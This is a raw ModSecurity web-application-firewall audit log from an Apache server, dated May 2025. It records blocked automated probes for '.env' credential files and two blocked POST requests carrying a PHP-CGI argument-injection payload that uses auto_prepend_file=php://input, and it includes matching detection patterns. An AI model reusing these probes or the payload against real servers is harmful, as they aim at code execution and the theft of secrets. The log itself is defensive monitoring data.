MQQBrowser/6.2 TBS/044813 Mobile Safari/537.36 MMWEBID/6904 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/4G Language/zh_CN Accept-Charset: utf-8 --9b59aa6a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b59aa6a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747203506997440 702 (- - -) Stopwatch2: 1747203506997440 702; combined=299, p1=267, p2=0, p3=0, p4=0, p5=32, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b59aa6a-Z-- --92511e7d-A-- [14/May/2025:13:40:43 +0700] aCQ66zMGvM3GPb0-SyQ8xgAAAEU 103.236.140.4 58324 103.236.140.4 8181 --92511e7d-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 167.99.181.249 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --92511e7d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --92511e7d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747204843007939 675 (- - -) Stopwatch2: 1747204843007939 675; combined=239, p1=208, p2=0, p3=0, p4=0, p5=31, sr=57, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --92511e7d-Z-- --8936834d-A-- [14/May/2025:13:58:47 +0700] aCQ_J8OlTOX2TmGW6_8mTwAAAMY 103.236.140.4 47282 103.236.140.4 8181 --8936834d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.131 Safari/537.36 Accept-Charset: utf-8 --8936834d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8936834d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747205927750342 750 (- - -) Stopwatch2: 1747205927750342 750; combined=311, p1=263, p2=0, p3=0, p4=0, p5=48, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8936834d-Z-- --f6602c49-A-- [14/May/2025:15:10:58 +0700] aCRQEsOlTOX2TmGW6_-LeAAAANM 103.236.140.4 51262 103.236.140.4 8181 --f6602c49-B-- GET /.env HTTP/1.0 Host: mignere.twilightparadox.com X-Real-IP: 164.92.107.174 X-Forwarded-Host: mignere.twilightparadox.com X-Forwarded-Server: mignere.twilightparadox.com X-Forwarded-For: 164.92.107.174 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --f6602c49-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6602c49-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747210258374575 798 (- - -) Stopwatch2: 1747210258374575 798; combined=339, p1=304, p2=0, p3=0, p4=0, p5=35, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6602c49-Z-- --fa098c68-A-- [14/May/2025:16:35:14 +0700] aCRj0jMGvM3GPb0-SyQJ6gAAAEg 103.236.140.4 32936 103.236.140.4 8181 --fa098c68-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 178.128.207.138 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 178.128.207.138 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --fa098c68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --fa098c68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747215314225228 792 (- - -) Stopwatch2: 1747215314225228 792; combined=312, p1=278, p2=0, p3=0, p4=0, p5=34, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fa098c68-Z-- --c215443f-A-- [14/May/2025:16:41:04 +0700] aCRlMMabX6K9rhby1vhThwAAAIU 103.236.140.4 47032 103.236.140.4 8181 --c215443f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.240 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.240 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 --c215443f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c215443f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747215664963533 738 (- - -) Stopwatch2: 1747215664963533 738; combined=327, p1=289, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c215443f-Z-- --8939091d-A-- [14/May/2025:17:36:58 +0700] aCRySsabX6K9rhby1vit4QAAAIs 103.236.140.4 34770 103.236.140.4 8181 --8939091d-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 171.244.40.232 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 171.244.40.232 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --8939091d-C-- --8939091d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8939091d-E-- --8939091d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747219018056917 4661 (- - -) Stopwatch2: 1747219018056917 4661; combined=2998, p1=530, p2=2441, p3=0, p4=0, p5=27, sr=97, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8939091d-Z-- --d2753119-A-- [14/May/2025:18:37:37 +0700] aCSAgV1ltXwOneQqchMRjgAAAAI 103.236.140.4 48700 103.236.140.4 8181 --d2753119-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 159.203.57.61 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 159.203.57.61 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko/20100101 Firefox/28.0 Accept: */* --d2753119-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d2753119-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747222657489335 840 (- - -) Stopwatch2: 1747222657489335 840; combined=345, p1=307, p2=0, p3=0, p4=0, p5=38, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d2753119-Z-- --138a4051-A-- [14/May/2025:19:04:47 +0700] aCSG311ltXwOneQqchNTQAAAAAM 103.236.140.4 46474 103.236.140.4 8181 --138a4051-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.197.238 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.197.238 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --138a4051-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --138a4051-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747224287708837 902 (- - -) Stopwatch2: 1747224287708837 902; combined=398, p1=358, p2=0, p3=0, p4=0, p5=40, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --138a4051-Z-- --7d96aa1d-A-- [14/May/2025:19:36:12 +0700] aCSOPDMGvM3GPb0-SySmLwAAAEk 103.236.140.4 39312 103.236.140.4 8181 --7d96aa1d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.217.145.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.217.145.218 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --7d96aa1d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7d96aa1d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747226172495803 1034 (- - -) Stopwatch2: 1747226172495803 1034; combined=405, p1=369, p2=0, p3=0, p4=0, p5=36, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7d96aa1d-Z-- --f1a8c266-A-- [14/May/2025:19:36:12 +0700] aCSOPMOlTOX2TmGW6_-tIwAAANQ 103.236.140.4 39322 103.236.140.4 8181 --f1a8c266-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.217.145.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.217.145.218 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f1a8c266-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f1a8c266-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747226172558370 854 (- - -) Stopwatch2: 1747226172558370 854; combined=297, p1=266, p2=0, p3=0, p4=0, p5=31, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f1a8c266-Z-- --ec6da23d-A-- [14/May/2025:19:36:14 +0700] aCSOPsOlTOX2TmGW6_-tSwAAANg 103.236.140.4 39466 103.236.140.4 8181 --ec6da23d-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 103.217.145.218 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 103.217.145.218 X-Forwarded-Proto: http Connection: close User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --ec6da23d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec6da23d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747226174211552 599 (- - -) Stopwatch2: 1747226174211552 599; combined=227, p1=201, p2=0, p3=0, p4=0, p5=26, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec6da23d-Z-- --ec025006-A-- [14/May/2025:21:57:45 +0700] aCSvaV1ltXwOneQqchPmzQAAAAs 103.236.140.4 43130 103.236.140.4 8181 --ec025006-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; Mi A1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 --ec025006-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec025006-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747234665493726 784 (- - -) Stopwatch2: 1747234665493726 784; combined=311, p1=277, p2=0, p3=0, p4=0, p5=33, sr=58, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec025006-Z-- --b2d13179-A-- [15/May/2025:00:10:16 +0700] aCTOeMabX6K9rhby1vjAigAAAJY 103.236.140.4 47092 103.236.140.4 8181 --b2d13179-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 165.22.121.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 165.22.121.74 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --b2d13179-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b2d13179-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747242616174212 814 (- - -) Stopwatch2: 1747242616174212 814; combined=378, p1=348, p2=0, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b2d13179-Z-- --50a8d21c-A-- [15/May/2025:00:56:01 +0700] aCTZMTMGvM3GPb0-SyTRIAAAAEU 103.236.140.4 59528 103.236.140.4 8181 --50a8d21c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.73.140 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.73.140 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 9_2 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13C75 Safari/601.1 Accept-Charset: utf-8 --50a8d21c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --50a8d21c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747245361882666 807 (- - -) Stopwatch2: 1747245361882666 807; combined=359, p1=314, p2=0, p3=0, p4=0, p5=45, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --50a8d21c-Z-- --bb4cfc62-A-- [15/May/2025:01:11:41 +0700] aCTc3cabX6K9rhby1vha3QAAAJU 103.236.140.4 55682 103.236.140.4 8181 --bb4cfc62-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 182.253.51.114 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.253.51.114 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --bb4cfc62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bb4cfc62-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747246301461658 862 (- - -) Stopwatch2: 1747246301461658 862; combined=303, p1=268, p2=0, p3=0, p4=0, p5=34, sr=56, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bb4cfc62-Z-- --b5ad3d24-A-- [15/May/2025:03:00:47 +0700] aCT2b11ltXwOneQqchOXhgAAABg 103.236.140.4 58178 103.236.140.4 8181 --b5ad3d24-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --b5ad3d24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5ad3d24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747252847960661 741 (- - -) Stopwatch2: 1747252847960661 741; combined=322, p1=289, p2=0, p3=0, p4=0, p5=32, sr=66, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5ad3d24-Z-- --4b29db28-A-- [15/May/2025:03:00:49 +0700] aCT2ccabX6K9rhby1vh4BQAAAJI 103.236.140.4 58332 103.236.140.4 8181 --4b29db28-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.80.158.152 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.80.158.152 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --4b29db28-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b29db28-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747252849738315 898 (- - -) Stopwatch2: 1747252849738315 898; combined=392, p1=346, p2=0, p3=0, p4=0, p5=46, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b29db28-Z-- --08717337-A-- [15/May/2025:04:03:39 +0700] aCUFK35oxhgjPv2ZXtkekAAAAII 103.236.140.4 38582 103.236.140.4 8181 --08717337-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 177.223.60.82 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 177.223.60.82 X-Forwarded-Proto: http Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --08717337-C-- --08717337-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08717337-E-- --08717337-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747256619952798 5211 (- - -) Stopwatch2: 1747256619952798 5211; combined=3232, p1=514, p2=2676, p3=0, p4=0, p5=42, sr=76, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08717337-Z-- --f07ddf78-A-- [15/May/2025:04:30:05 +0700] aCULXX5oxhgjPv2ZXtkfNQAAAIw 103.236.140.4 41330 103.236.140.4 8181 --f07ddf78-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.175 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0 Accept-Charset: utf-8 --f07ddf78-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; 